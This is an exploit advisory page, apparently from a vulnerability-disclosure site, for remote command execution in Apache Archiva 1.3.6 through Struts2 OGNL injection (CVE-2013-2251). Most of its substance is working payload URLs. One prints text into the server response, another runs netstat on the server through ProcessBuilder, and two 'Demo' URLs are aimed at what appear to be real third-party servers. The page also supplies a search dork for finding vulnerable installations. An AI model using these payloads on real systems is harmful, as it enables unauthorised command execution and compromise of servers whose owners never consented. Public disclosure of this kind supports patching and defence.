Apache Archiva 1.3.6 => Remote Command Execution 0day

Published / (Updated)
Credit
Risk
2014-01-14 / 2014-01-15
Kacper
High
CWE
CVE
Local
Remote
N/A
CVE-2013-2251
No
Yes
Dork: \"Apache Archiva \\ Browse Repository\"

CVSS Base Score
Impact Subscore
Exploitability Subscore
9.3/10
10/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

Apache Archiva 1.3.6 => Remote Command Execution
####################################################################
Author: Kacper
Contact: info[at]devilteam.pl
Home Page: https://devilteam.pl/
####################################################################
Vendor: http://archiva.apache.org/
Dork: "Apache Archiva \ Browse Repository"

Description:
Apache Archiva use Apache Struts2:
"In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code."
In Apache Archiva can be use parameter redirect: for OGNL injection.

PoC:
(print devilteam.pl) http://imageshack.com/a/img163/6865/e88n.png

http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27
com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println
%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

{execute netstat) http://imageshack.com/a/img843/1662/0r84.png

http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder
%28new%20java.lang.String[]{%27netstat%27}%29%29.start%28%29,%23b%3d%23a.
getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,
%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],
%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2
.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,
%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

Demo:
http://archiva.eionet.eurXpa.eu/security/login.action?redirect:${%23w%3d%23context.get
%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter
%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

http://community.ucs.indiXna.edu:9090/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.
println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

Cheers:
cxsecurity.com
Bartek (ZUOO)
and all people from devilteam.pl

Reference:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
https://devilteam.pl/viewtopic.php?p=43506

References:

https://devilteam.pl/viewtopic.php?p=43506
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://imageshack.com/a/img163/6865/e88n.png
http://imageshack.com/a/img843/1662/0r84.png
http://seclists.org/oss-sec/2014/q1/87
http://devilteam.pl/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com